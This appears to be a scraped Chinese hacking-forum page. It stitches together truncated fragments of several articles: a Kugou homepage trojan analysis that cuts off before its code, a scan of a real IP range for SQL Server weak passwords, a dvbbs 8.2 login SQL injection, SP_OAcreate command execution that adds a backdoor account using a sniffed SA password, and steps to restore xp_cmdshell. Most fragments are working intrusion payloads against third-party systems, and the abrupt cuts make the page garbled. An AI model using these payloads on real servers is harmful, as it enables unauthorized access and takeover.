酷狗音乐首页隐蔽挂马详细分析+72只马 - [技术文档]
作者: yimike
来源: 剑盟
近来有朋友反映酷狗音乐首页挂马,而且奇怪的是只有第一次访问该页时杀软会提示挂马;之后除非换IP,否则无论怎么刷新杀软都不会提示网页挂马。于是循着这个线索,打开了酷狗音乐首页(h**p://www.kugou.com/home),最终找到了极其隐蔽的挂马。
详细过程如下:
1.h**p://www.kugou.com/home该页面代码看似正常,但是有个看起来比较正常但是却比较隐蔽的iframe,代码如下:
企业服务器安全性测试 SQL Server弱口令测试 - [技术文档]
企业服务器安全性测试 SQL Server弱口令测试
对于企业而言,服务器的重要性是不言而喻的。因此管理员们往往以维持服务器的稳定、高效地运行作为自己的工作目标,但是对于服务器的安全性往往考虑得较少,至少对于某些管理员是这样的。
最近笔者进行了一例服务器的安全测试,下面把这例测试过程写下来,希望对大家有所启示。
测试工具:
1.S扫描器(一种速度极快的多线程命令行下的扫描工具)
2.SQL登陆器
3.DNS溢出工具
4.cmd(微软命令行工具)
4.scansql.exe(SQL弱口令扫描工具)
SQL Server弱口令测试
1.缘由:
SQL Server是很多中小型企业、事业单位的首选数据库系统,由于一些管理员的疏忽或者安全意识淡薄,总是以数据库默认的用户SA登录数据库,并且采用了默认的空密码或者设置了若口令。
2.测试:
以笔者本机IP为中心,随机选取了一个IP段进行测试。
第一步:在命令提示符下运行s扫描器,输入一个IP段:
s syn 61.178.*.1 61.178.*.254 1433 扫描到13个开了1433端口的服务器。(图1)
dvbbs 8.2 注入漏洞利用 - [技术文档]
漏洞利用:(access版)
由于使用验证码,该漏洞只能纯手工进行注入尝试,在用户登陆页面,用户名处构造sql语句
如:
判断
Where' and '1'='1
where' and '1'='2
密码任意6位,输入验证码,根据返回信息,第一条显示用户名或密码错误第二条显示无此用户,猜解用户
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1
………………………
SQL存储过程的一些利用方法 - [技术文档]
注:关于sql存储过程的利用,本站有很多资料的。这篇写的比较好,很多的地方有很有特点,好好学习吧。
其实,之前NCPH那篇黑pcshare那里,可以说特点也就是那个列目录的sql存储过程,和一个平时入侵,要懂的分类收集信息的习惯,这两点比较有观赏价值。
文章我改了名字,我觉得还是用这个比较合适,so。。擅自做主,改了,希望原作者谅解.
如果各位觉得看的不过瘾的,可去红狼看原版,图片我去掉了。
作者:小志
文章首发:红狼安全小组 如需转载请著名
正文:
前几天在搞一个站的时候嗅到了一个SA密码 但是用sql tool连上之后发现怎么也不能执行DOS命令
郁闷了 今天突然想到可以用存储过程来搞定这个服务器~
首先在本地用sql server的查询分析器连上他 权限当然是SA啦
但是在执行exec master.dbo.xp_cmdshell'net user'的时候却提示跟sql tool一样的错误 看来xp_cmdshell确
实不能用
错误消息
50001,级别 1,状态 50001
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)
可能是某个相关的DLL文件被删除了
看来xp_cmdshell是不能用鸟~ 不过偶们还有SP_OAcreate可以用 用SP_OAcreate一样可以执行系统命令
在查询分析器里执行
程序代码
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user gydyhook hook /add'
恢复xp_cmdshell的N个方法 - [技术文档]
方法1:查询分离器连接后
第一步执行:use master
第二步执行:sp_dropextendedproc 'xp_cmdshell'
然后按F5键命令执行完毕
三.常见情况恢复执行xp_cmdshell.
1 未能找到存储过程'master..xpcmdshell'.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕
